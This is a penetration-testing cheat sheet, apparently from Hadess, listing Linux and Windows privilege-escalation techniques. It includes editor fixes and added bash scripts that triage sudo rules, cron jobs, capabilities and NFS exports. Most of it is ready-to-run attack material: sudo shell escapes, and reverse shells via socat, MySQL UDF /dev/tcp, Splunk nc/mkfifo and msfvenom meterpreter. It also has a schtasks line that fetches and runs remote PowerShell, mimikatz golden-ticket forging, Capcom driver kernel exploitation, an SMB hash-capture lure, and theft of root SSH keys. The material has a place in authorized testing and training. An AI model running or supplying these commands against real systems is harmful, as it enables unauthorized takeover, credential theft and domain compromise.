WWW.HADESS.IO
40 METHODS FOR PRIVILEGE ESCALATION
PART 1
HADESS | SECURE AGILE DEVELOPMENT

ABUSING SUDO BINARIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Privileged Files

Each line spawns a root shell through a binary the user is allowed to run with sudo; list the allowed binaries first with sudo -l.
    sudo vim -c ':!/bin/bash'
    sudo find /etc/passwd -exec /bin/bash \;
    echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
    sudo env /bin/bash
    sudo awk 'BEGIN {system("/bin/bash")}'
    sudo perl -e 'exec "/bin/bash";'
    sudo python -c 'import pty; pty.spawn("/bin/bash")'
    sudo less /etc/hosts        then type !bash at the pager prompt
    sudo man man                then type !bash at the pager prompt
    sudo ftp                    then type ! /bin/bash at the ftp> prompt
    Attacker: socat file:`tty`,raw,echo=0 tcp-listen:1234
    Victim:   sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
    echo test > notes.txt && sudo zip test.zip notes.txt -T --unzip-command="sh -c /bin/bash"
    sudo gcc -wrapper /bin/bash,-s .
The original prints the find line as "find / etc/passwd" and the nmap payload with a trailing slash ("/bin/bash/"); both are fixed above.

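As an added example (not part of the Hadess sheet), this script triages "sudo -l" output against the binaries the card above lists as shell escapes. The sudo -l text, the user alice and the host web01 are constructed for the example; on a real box pipe the real output into find_sudo_escapes.

```shell
#!/usr/bin/env bash
# Added example (not from the Hadess sheet): triage "sudo -l" output against
# the shell-escape binaries listed in the card above.
# Real use: sudo -l | find_sudo_escapes

# Constructed sample of "sudo -l" output for a low-privileged user "alice".
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (ALL) NOPASSWD: /usr/bin/apt update
    (root) /usr/bin/zip
    (root) /usr/bin/systemctl status'

# Binaries from the card that hand out a root shell when allowed via sudo.
ESCAPE_BINS="vim find nmap env awk perl python python3 less man ftp socat zip gcc"

# Read "sudo -l" text on stdin; print "<binary> <rule>" for every rule whose
# command is one of ESCAPE_BINS. Rule lines look like
# "(runas) [NOPASSWD:] /path/to/cmd [args]".
find_sudo_escapes() {
    while IFS= read -r line; do
        case "$line" in
            *"("*")"*/*) ;;      # has a (runas) part and a path
            *) continue ;;
        esac
        # Drop "(runas)" and the optional NOPASSWD:/PASSWD: tag, keep the command word.
        cmd=$(printf '%s\n' "$line" \
            | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*((NO)?PASSWD:)?[[:space:]]*//' \
            | awk '{print $1}')
        base=${cmd##*/}
        for b in $ESCAPE_BINS; do
            if [ "$base" = "$b" ]; then
                printf '%s %s\n' "$base" "$(printf '%s\n' "$line" | sed 's/^[[:space:]]*//')"
            fi
        done
    done
}

# Number of escape-capable rules in the constructed sample (find, vim, zip).
count_sample_escapes() {
    printf '%s\n' "$SAMPLE_SUDO_L" | find_sudo_escapes | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_SUDO_L" | find_sudo_escapes
```

Rules whose command is not one of the listed binaries (apt, systemctl with fixed arguments) are ignored; those still deserve a look by hand, since sudoers arguments can often be bypassed, but they are not the one-liners this card is about.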
ABUSING SCHEDULED TASKS
Domain: Y/N | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks

Precondition: a cron job that runs as root executes a script the current user can write to (here /home/user/systemupdate.sh; look in /etc/crontab, /etc/cron.d/* and /var/spool/cron/).
    echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
    chmod +x /home/user/systemupdate.sh
    (wait for the job to fire)
    /bin/bash -p
    id && whoami

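As an added example (not part of the Hadess sheet), the check a practitioner runs before trying this card: scan a system crontab for root jobs whose script is world-writable or not owned by root. The crontab, the two scripts and their paths are constructed in a temporary directory for the example; against a real host feed /etc/crontab and /etc/cron.d/* into writable_root_cron_targets.

```shell
#!/usr/bin/env bash
# Added example (not from the Hadess sheet): find root cron jobs whose script
# the current user can modify, the precondition for the trick in the card above.
# Real use: cat /etc/crontab /etc/cron.d/* | writable_root_cron_targets

# Constructed scenario in a temp dir so nothing under /etc is touched.
WORK=$(mktemp -d)
mkdir -p "$WORK/home/user"
printf '#!/bin/bash\necho backup\n' > "$WORK/home/user/systemupdate.sh"
chmod 777 "$WORK/home/user/systemupdate.sh"   # world-writable: the misconfiguration
printf '#!/bin/bash\necho rotate\n' > "$WORK/rotate.sh"
chmod 755 "$WORK/rotate.sh"                    # sane permissions

# Constructed system crontab (field 6 is the run-as user, field 7 the command).
CRONTAB="SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root $WORK/home/user/systemupdate.sh
0 2 * * *   root $WORK/rotate.sh
17 * * * *  root cd / && run-parts --report /etc/cron.hourly
# a comment"

# Read crontab lines on stdin; for every job that runs as root with an absolute
# script path, print "<path> <reason>" when the script is world-writable or
# owned by someone other than root. Permissions come from ls -l, so the check
# gives the same answer whether or not this script itself runs as root.
writable_root_cron_targets() {
    while IFS= read -r line; do
        case "$line" in ''|\#*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=value
        user=$(printf '%s\n' "$line" | awk '{print $6}')
        cmd=$(printf '%s\n' "$line" | awk '{print $7}')
        [ "$user" = root ] || continue
        case "$cmd" in /*) ;; *) continue ;; esac              # only absolute script paths
        perms=$(ls -ld "$cmd" 2>/dev/null) || continue
        mode=$(printf '%s\n' "$perms" | cut -c1-10)
        owner=$(printf '%s\n' "$perms" | awk '{print $3}')
        case "$mode" in ????????w?) printf '%s world-writable\n' "$cmd" ;; esac
        [ "$owner" = root ] || printf '%s owned-by=%s\n' "$cmd" "$owner"
    done
}

# Remove the constructed files when done experimenting.
cleanup_demo() { rm -rf "$WORK"; }

printf '%s\n' "$CRONTAB" | writable_root_cron_targets
```

Jobs like the run-parts line are skipped here because their command is not a single absolute path; for those, check the directory they read (/etc/cron.hourly and friends) for writable entries by hand. Per-user crontabs in /var/spool/cron have no user field and need the user taken from the file name instead.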
GOLDEN TICKET WITH SCHEDULED TASKS
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abusing Scheduled Tasks

    1. mimikatz # token::elevate
    2. mimikatz # vault::cred /patch
    3. mimikatz # lsadump::lsa /patch
    4. mimikatz # kerberos::golden /user:Administrator /rc4:<krbtgt NTLM hash from step 3> /domain:<DOMAIN> /sid:<DOMAIN SID> /sids:<extra SIDs for SID history, optional> /ticket:<OUTPUT TICKET PATH>
       then mimikatz # kerberos::ptt <OUTPUT TICKET PATH>   (or use /ptt instead of /ticket: in step 4)
    5. (attacker) powercat -l -v -p 443
    6. schtasks /create /S <DC HOSTNAME> /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://10.10.10.10/reverse.ps1)'"
    7. schtasks /run /S <DC HOSTNAME> /TN "enterprise"
A golden ticket is a TGT signed with the krbtgt key, so the hash in step 4 is krbtgt's (the original prints "Administrator NTLM"), and /sid is the domain SID, not a user SID. The forged ticket must be in the current logon session before schtasks in steps 6-7 can authenticate to the DC with it.

ABUSING INTERPRETER CAPABILITIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Capabilities

    1. getcap -r / 2>/dev/null
       a. /usr/bin/python2.6 = cap_setuid+ep
       b. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
       c. id && whoami
    2. getcap -r / 2>/dev/null
       a. /usr/bin/perl = cap_setuid+ep
       b. /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
       c. id && whoami

ABUSING BINARY CAPABILITIES
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Capabilities

    1. getcap -r / 2>/dev/null
    2. /usr/bin/tar = cap_dac_read_search+ep        (tar may read any file regardless of its permissions)
    3. /usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
    4. /usr/bin/tar -xvf key.tar                      (extracts to ./root/.ssh/id_rsa, usable for ssh -i as root)
    5. openssl req -engine /tmp/priv.so
    6. /bin/bash -p
    7. id && whoami
Steps 5-6 do not follow from the tar extraction: they belong to a separate capability abuse in which openssl, itself carrying a capability, loads an attacker-built engine library (/tmp/priv.so) that sets the SUID bit on /bin/bash, which is what makes /bin/bash -p work. With the tar path the payoff is the extracted key in step 4.

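As an added example (not part of the Hadess sheet) covering both this card and ABUSING INTERPRETER CAPABILITIES, the script below ranks getcap output by what each capability lets a local user do. The getcap lines are constructed for the example and include both output formats libcap prints; the list of capabilities and their impact is the editor's, not the sheet's.

```shell
#!/usr/bin/env bash
# Added example (not from the Hadess sheet): rank "getcap -r / 2>/dev/null"
# output by what each capability lets a local user do, covering the
# interpreter (python/perl + cap_setuid) and binary (tar + cap_dac_read_search)
# cards. Real use: getcap -r / 2>/dev/null | dangerous_caps

# Constructed getcap output in both formats libcap prints
# ("path = cap+ep" on older versions, "path cap=ep" on newer ones).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep'

# Why a capability matters for privilege escalation; returns 1 if it is not
# one of the capabilities that lead directly to root or root-only data.
explain_cap() {
    case "$1" in
        cap_setuid)          echo "call setuid(0) and exec a shell (python/perl cards)" ;;
        cap_setgid)          echo "switch to any group, e.g. shadow or docker" ;;
        cap_dac_read_search) echo "read any file, e.g. /root/.ssh/id_rsa or /etc/shadow (tar card)" ;;
        cap_dac_override)    echo "bypass write permission checks, e.g. edit /etc/passwd" ;;
        cap_chown)           echo "take ownership of any file" ;;
        cap_fowner)          echo "chmod any file, e.g. set the SUID bit on a shell" ;;
        cap_sys_admin)       echo "mount filesystems and much more; effectively root" ;;
        cap_sys_ptrace)      echo "attach to and inject into root processes" ;;
        cap_sys_module)      echo "load kernel modules" ;;
        *) return 1 ;;
    esac
}

# Read getcap output on stdin; print "<path> <capability>: <impact>" for each
# capability that explain_cap knows about.
dangerous_caps() {
    while read -r path rest; do
        [ -n "$path" ] || continue
        # Strip the leading "= " (old format) and the trailing flag set (=ep, +ep, +eip).
        caps=$(printf '%s\n' "$rest" | sed -E 's/^=[[:space:]]*//; s/[=+][eip]+$//')
        for c in $(printf '%s\n' "$caps" | tr ',' ' '); do
            if impact=$(explain_cap "$c"); then
                printf '%s %s: %s\n' "$path" "$c" "$impact"
            fi
        done
    done
}

# Number of dangerous findings in the constructed sample (python, perl, tar).
count_sample_caps() {
    printf '%s\n' "$SAMPLE_GETCAP" | dangerous_caps | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_GETCAP" | dangerous_caps
```

ping and arping carry cap_net_raw, which is their intended job and not an escalation path, so they are filtered out; the same goes for the network capabilities on the helper binary. A finding on an interpreter or an archiver is the interesting case because those binaries will happily run or read whatever they are told to.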
ABUSING ACTIVESESSIONS CAPABILITIES
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Capabilities

    1. Fetch Invoke-SQLOSCmd.ps1 (runs OS commands through xp_cmdshell on a SQL Server instance the current Windows session can log in to):
       https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1
    2. . .\Heidi.ps1        (the downloaded script saved under that name; dot-source whatever you called it)
    3. Invoke-SQLOSCmd -Verbose -Command "net localgroup administrators user1 /add" -Instance COMPUTERNAME
Step 3 only works if the SQL login the current session maps to is sysadmin (or may enable xp_cmdshell). The original prints the cmdlet name as Invoke-SQLOCmd.

ESCALATE WITH TRUSTWORTHY IN SQL SERVER
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abusing Capabilities

    1. . .\PowerUpSQL.ps1
    2. Get-SQLInstanceLocal -Verbose
    3. (Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.10" -Query 'select * from master..sysservers').CustomQuery
    4. Enumerate the target database through the link and enable xp_cmdshell there:
       USE "master";
       SELECT *, SCHEMA_NAME("schema_id") AS 'schema' FROM "master"."sys"."objects" WHERE "type" IN ('P', 'U', 'V', 'TR', 'FN', 'TF', 'IF');
       execute('sp_configure "xp_cmdshell",1;RECONFIGURE') at "<LINKED SERVER NAME>"
    5. powershell -ep bypass
    6. Import-Module .\powercat.ps1
    7. powercat -l -v -p 443 -t 10000
    8. execute('exec master..xp_cmdshell "\\10.10.10.10\reverse.exe"') at "<LINKED SERVER NAME>"
The original repeats the SELECT and sp_configure lines of step 4 under step 8 and writes the EXECUTE ... AT target as <DOMAIN>\<DATABASE NAME>; AT takes the linked server name as registered in sysservers. xp_cmdshell is an advanced option, so on a hardened instance execute('sp_configure "show advanced options",1;RECONFIGURE') at "<LINKED SERVER NAME>" has to go first, and the link must be configured to log in with a sysadmin context (or RPC Out enabled) for the remote EXECUTE to work.

ABUSING MYSQL RUN AS ROOT
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Abusing Services

    1. ps aux | grep root          (confirm mysqld runs as root)
    2. mysql -u root -p
    3. mysql> \! chmod +s /bin/bash
    4. mysql> exit
    5. /bin/bash -p
    6. id && whoami
Caveat: \! (the client's system command) runs on the client side with the privileges of whoever launched mysql, not the server's. Step 3 therefore only escalates when the client itself runs as root (for example through a sudo rule for mysql). When only mysqld runs as root, go through the server instead: the UDF method in MYSQL UDF CODE INJECTION, or a FILE-privilege write such as SELECT ... INTO OUTFILE. The original lists OS: Windows; the commands are Linux.

ABUSING JOURNALCTL
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Services

    1. sudo journalctl        (or any journalctl invocation that runs as root, e.g. through a sudoers entry)
    2. !/bin/sh               (typed at the less pager prompt; the journal must be longer than the screen so the pager opens)

ABUSING VDS
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Services

    1. . .\PowerUp.ps1
    2. Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse rewrites the service's binary path and restarts it, so this needs a vds (Virtual Disk) service configuration the current user may modify; Get-ModifiableService from PowerUp shows whether that is the case. With -UserName the default action adds that user to the local Administrators group.

ABUSING BROWSER
Domain: No | Local Admin: Yes | OS: Windows | Type: Abusing Services

    1. . .\PowerUp.ps1
    2. Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
Same mechanism as ABUSING VDS against the Computer Browser service: it requires a service ACL that lets the current user change the binary path, not a flaw in the service itself.

ABUSING LDAP
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Abusing Services

    1. ldapmodify -x -D "<BIND DN>" -w PASSWORD      (the original prints "exec ldapmodify -x -w PASSWORD"; without -D the bind is anonymous and the modify fails)
       and paste the openssh-lpk schema, needed only if the directory does not already have the sshPublicKey attribute:
dn: cn=openssh-lpk,cn=schema,cn=config
objectClass: olcSchemaConfig
cn: openssh-lpk
olcAttributeTypes: ( 1.3.6.1.4.1.24552.500.1.1.1.13 NAME 'sshPublicKey'
 DESC 'MANDATORY: OpenSSH Public key'
 EQUALITY octetStringMatch
 SYNTAX 1.3.6.1.4.1.1466.115.121.1.40 )
olcObjectClasses: ( 1.3.6.1.4.1.24552.500.1.1.2.0 NAME 'ldapPublicKey' SUP top AUXILIARY
 DESC 'MANDATORY: OpenSSH LPK objectclass'
 MAY ( sshPublicKey $ uid ) )

    2. ldapmodify -x -D "<BIND DN>" -w PASSWORD
       and paste the modification of the user entry:
dn: uid=UID,ou=users,ou=linux,ou=servers,dc=DC,dc=DC
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: <content of id_rsa.pub>
-
replace: uidNumber
uidNumber: <TARGET UID, e.g. 0 for root>
-
replace: gidNumber
gidNumber: <TARGET GID, e.g. 0>
The last two blocks are garbled in the original ("replace: EVIL GROUP ID / uidNumber: CURRENT USER ID" and the reverse); the intent is to point the entry's uidNumber and gidNumber at the privileged account so that a host resolving users from LDAP maps this login to it. This works only when the bind credentials may write that entry, the hosts resolve uid/gid through LDAP (nss), and sshd fetches keys from LDAP (AuthorizedKeysCommand), which is what the sshPublicKey attribute is for.

LLMNR POISONING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abusing Services

    1. responder -I eth1 -v
    2. Create Book.url in a share the victim browses; Explorer fetches the icon over SMB from the attacker and authenticates, which Responder captures as a NetNTLMv2 hash:
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico
Step 2 is forced authentication rather than LLMNR poisoning proper; Responder's LLMNR/NBT-NS answers in step 1 catch clients that mistype or look up non-existent hostnames, the .url file catches everyone who opens the folder.

ABUSING CERTIFICATE SERVICES
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abusing Services

    1. adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
    2. adcspwn.exe --adcs cs.pwnlab.local
    3. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
    4. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
    5. adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
ADCSPwn coerces the --remote machine (here the DC) to authenticate to its local listener and relays that NTLM authentication to the AD CS web enrollment endpoint on --adcs, which hands back a certificate for the machine account; the relay works only while the enrollment endpoint accepts NTLM over HTTP without Extended Protection for Authentication. The pwnlab.local names and the credentials in step 5 are the sample values printed in the original.

MYSQL UDF CODE INJECTION
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Injection

    1. mysql -u root -p
    2. mysql> use mysql;
    3. mysql> create table admin(line blob);
    4. mysql> insert into admin values(load_file('/tmp/lib_mysqludf_sys.so'));
    5. mysql> select * from admin into dumpfile '/usr/lib/lib_mysqludf_sys.so';
    6. mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
    7. mysql> select sys_exec('bash -i >& /dev/tcp/10.10.10.10/9999 0>&1');
The .so must land in the server's plugin directory (select @@plugin_dir; on current builds that is typically /usr/lib/mysql/plugin/ rather than /usr/lib/). load_file and INTO DUMPFILE need the FILE privilege and a secure_file_priv setting that does not exclude those paths, and the reverse shell runs as the user mysqld runs as, which is why this card pairs with ABUSING MYSQL RUN AS ROOT.

IMPERSONATION TOKEN WITH IMPERSONATELOGGEDONUSER
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

    1. SharpImpersonation.exe user:<user> shellcode:<URL>
    2. SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnUser

IMPERSONATION TOKEN WITH SEIMPERSONATEPRIVILEGE
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

    1. execute-assembly SweetPotato.exe -p beacon.exe        (Cobalt Strike syntax; outside a beacon run SweetPotato.exe -p <program> directly)
Requires SeImpersonatePrivilege in the current token, which service accounts such as those behind IIS or MSSQL typically hold; the launched program runs as SYSTEM.

IMPERSONATION TOKEN WITH SELOADDRIVERPRIVILEGE
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection

    1. EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys
Loads Driver.sys through NtLoadDriver using a service key created under the current user's registry hive (the first argument is relative to HKCU), which SeLoadDriverPrivilege permits; the full chain with a vulnerable signed driver is in ESCALATE WITH SELOADDRIVERPRIVILEGE below. The original prints the paths with doubled backslashes.

OPENVPN CREDENTIALS
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Enumeration & Hunt

    1. locate *.ovpn            (or find / -name '*.ovpn' 2>/dev/null when the locate database is stale)
Look inside each profile for an auth-user-pass <file> line; that file holds the username and password in clear text.

BASH HISTORY
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Enumeration & Hunt

    1. history
    2. cat /home/<user>/.bash_history
    3. grep -i passw ~/.bash_history

PACKET CAPTURE
Domain: No | Local Admin: Yes | OS: Windows/Linux | Type: Sniff

    1. tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='

NFS ROOT SQUASHING
Domain: Yes | Local Admin: Yes | OS: Linux | Type: Remote Procedure Calls (RPC)

Precondition: the export is writable and has no_root_squash (cat /etc/exports on the target), so root on the attacking client stays root on the share.
    1. showmount -e <victim_ip>
    2. mkdir /tmp/mount
    3. mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount        (as root on the attacker; drop vers=2 if the server refuses NFSv2)
    4. cd /tmp/mount
    5. cp /bin/bash .
    6. chmod +s bash
    7. On the target, as the low-privileged user: /tmp/bash -p
The copied bash must match the target's architecture and libc; copying the target's own /bin/bash into the share from the target side and then running chown root and chmod +s on it from the attacker's mount avoids that problem.

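As an added example (not part of the Hadess sheet), a small parser that tells, from an /etc/exports file, which exports are exploitable the way this card describes: writable and exported with no_root_squash. The exports file below is constructed for the example; on the target pipe the real /etc/exports into exploitable_exports.

```shell
#!/usr/bin/env bash
# Added example (not from the Hadess sheet): from /etc/exports, list the
# exports that are rw and no_root_squash, i.e. where a SUID bash dropped by a
# root client keeps working. Real use: cat /etc/exports | exploitable_exports

# Constructed /etc/exports. The default is root_squash, so only an explicit
# no_root_squash counts; read-only exports are never interesting here.
SAMPLE_EXPORTS='# /etc/exports
/tmp           *(rw,sync,no_root_squash,no_subtree_check)
/srv/www       10.0.0.0/24(ro,sync,root_squash)
/backup        10.0.0.5(rw,no_root_squash) 10.0.0.6(rw)
/home/shared   *(rw,sync)'

# Read exports on stdin; print "<path> <client> <options>" for every
# client(options) entry that is both rw and no_root_squash.
exploitable_exports() {
    set -f   # entries contain "*"; stop the shell from globbing them
    while IFS= read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        path=$(printf '%s\n' "$line" | awk '{print $1}')
        for entry in $(printf '%s\n' "$line" | awk '{for (i = 2; i <= NF; i++) print $i}'); do
            client=$(printf '%s\n' "$entry" | sed 's/(.*//')
            opts=$(printf '%s\n' "$entry" | sed -n 's/^[^(]*(\(.*\))$/\1/p')
            case ",$opts," in
                *,rw,*) ;;
                *) continue ;;
            esac
            case ",$opts," in
                *,no_root_squash,*) printf '%s %s %s\n' "$path" "$client" "$opts" ;;
            esac
        done
    done
    set +f
}

# Number of exploitable entries in the constructed sample (/tmp and /backup for 10.0.0.5).
count_sample_exports() {
    printf '%s\n' "$SAMPLE_EXPORTS" | exploitable_exports | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_EXPORTS" | exploitable_exports
```

The client column matters as much as the options: /backup is only unsquashed for 10.0.0.5, so the mount in step 3 has to come from that address (or a spoofable one) for the chmod +s to survive.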
ABUSING ACCESS CONTROL LIST
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    1. $user = "megacorp\jorden"
    2. $folder = "C:\Users\administrator"
    3. $acl = Get-Acl $folder
    4. $aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow"
    5. $aclrule = New-Object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
    6. $acl.AddAccessRule($aclrule)
    7. Set-Acl -Path $folder -AclObject $acl
    8. Get-Acl $folder | Format-List
Step 7 only succeeds if the current user already holds WriteDACL (or ownership) on the folder; the card turns that single right into FullControl for the chosen user. The original prints step 8 as "get-acl $folder | folder".

ESCALATE WITH SEBACKUPPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    1. Import-Module .\SeBackupPrivilegeUtils.dll
    2. Import-Module .\SeBackupPrivilegeCmdLets.dll
    3. Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
z: is a shadow copy of the system drive exposed with diskshadow (see DUMPING WITH DISKSHADOW); ntds.dit is locked on the live volume. Extracting the hashes also needs the SYSTEM hive (reg save HKLM\SYSTEM C:\temp\system), after which secretsdump.py -ntds ntds.dit -system system LOCAL does the rest. The original misspells the destination as ndts.dit.

ESCALATE WITH SEIMPERSONATEPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    1. https://github.com/dievus/printspoofer
    2. printspoofer.exe -i -c "powershell -c whoami"
Works from any token holding SeImpersonatePrivilege; -i runs the command interactively in the current console. It depends on the Print Spooler service running.

ESCALATE WITH SELOADDRIVERPRIVILEGE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

FIRST:
    Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
    Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
    Download https://github.com/tandasat/ExploitCapcom
    Change ExploitCapcom.cpp line 292 from
        TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    to
        TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
    then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
SECOND:
    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
    2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
    3. .\ExploitCapcom.exe
    4. in msf, start the matching handler (exploit/multi/handler with windows/meterpreter/reverse_tcp) with run before step 3
Capcom.sys is a signed driver that executes caller-supplied code in the kernel, which is why a mere SeLoadDriverPrivilege holder can turn loading it into a SYSTEM shell; ExploitCapcom launches CommandLine from that context.

ESCALATE WITH FORCECHANGEPASSWORD
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    1. https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
    2. Import-Module .\PowerView_dev.ps1
    3. Set-DomainUserPassword -Identity user1 -Verbose        (prompts for the new password; pass it with -AccountPassword <SecureString> to avoid the prompt)
    4. Enter-PSSession -ComputerName COMPUTERNAME -Credential <DOMAIN\user1 credential with the new password>
Step 3 needs the User-Force-Change-Password extended right on user1 (what BloodHound shows as ForceChangePassword). The original prints step 4 with an empty -Credential "".

ESCALATE WITH GENERICWRITE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    $pass = ConvertTo-SecureString 'Password123#' -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential('DOMAIN\MASTER USER', $pass)
    Set-DomainObject -Credential $creds -Identity USER1 -Clear serviceprincipalname
    Set-DomainObject -Credential $creds -Identity USER1 -Set @{serviceprincipalname='none/fluu'}
    .\Rubeus.exe kerberoast /domain:<DOMAIN>
Targeted Kerberoasting: GenericWrite on USER1 lets MASTER USER set an SPN on it, after which a service ticket for that SPN (encrypted with USER1's password hash) can be requested and cracked offline. Clear the SPN again afterwards. The original drops the closing parenthesis of the PSCredential constructor.

ABUSING GPO
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Privilege

    1. .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"
Needs write access to the named GPO (GenericWrite or WriteDACL on the GPO object). The immediate task runs as SYSTEM on every computer the GPO applies to at the next Group Policy refresh; gpupdate /force on a target speeds it up.

PASS-THE-TICKET
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Ticket

    1. .\Rubeus.exe asktgt /user:<USER>$ /rc4:<NTLM HASH> /ptt
    2. klist
Strictly this is overpass-the-hash: asktgt turns the NTLM hash (here of a machine account, hence the trailing $) into a fresh TGT and /ptt injects it into the session. Passing an already captured ticket is .\Rubeus.exe ptt /ticket:<base64 kirbi>. The original prints the placeholder as <USET>.

GOLDEN TICKET
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Ticket

    1. mimikatz # lsadump::dcsync /user:<DOMAIN>\krbtgt
    2. mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN SID> /rc4:<krbtgt NTLM HASH> /id:<USER RID> /ptt
The original prints the hash option as /rce: and the SID as an object SID; a golden ticket needs the krbtgt hash from step 1 and the domain SID (the S-1-5-21-... prefix without the trailing RID). DCSync requires replication rights (Domain Admins by default), so this is persistence from an already privileged position rather than an escalation.

ABUSING SPLUNK UNIVERSAL FORWARDER
Domain: Yes | Local Admin: Y/N | OS: Linux/Windows | Type: Abuse Channel

    python PySplunkWhisperer2_remote.py --lhost 10.10.10.5 --host 10.10.15.20 --username admin --password admin --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.10.5 5555 >/tmp/luci11"'
The forwarder's management port (8089 by default) accepts an app deployment with the forwarder's admin credentials and runs the app's scripted input as the forwarder's service user, which is root on most Linux installs and SYSTEM on Windows.

ABUSING GDBUS
Domain: No | Local Admin: Yes | OS: Linux | Type: Abuse Channel

    gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/authorized_keys /root/.ssh/authorized_keys true
The usb-creator D-Bus helper runs as root and its Image method copies the first path to the second; here that plants the caller's public key as root's authorized_keys, after which ssh -i <matching private key> root@localhost finishes the job. It only works on usb-creator builds that do not authorize the call through polkit.

ABUSING TRUSTED DC
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Abuse Channel

    1. Find a user on the first DC
    2. If port 6666 is reachable (WinRM exposed on a non-standard port in the original lab)
    3. proxychains evil-winrm -u user -p 'pass' -i 10.100.9.253 -P 6666
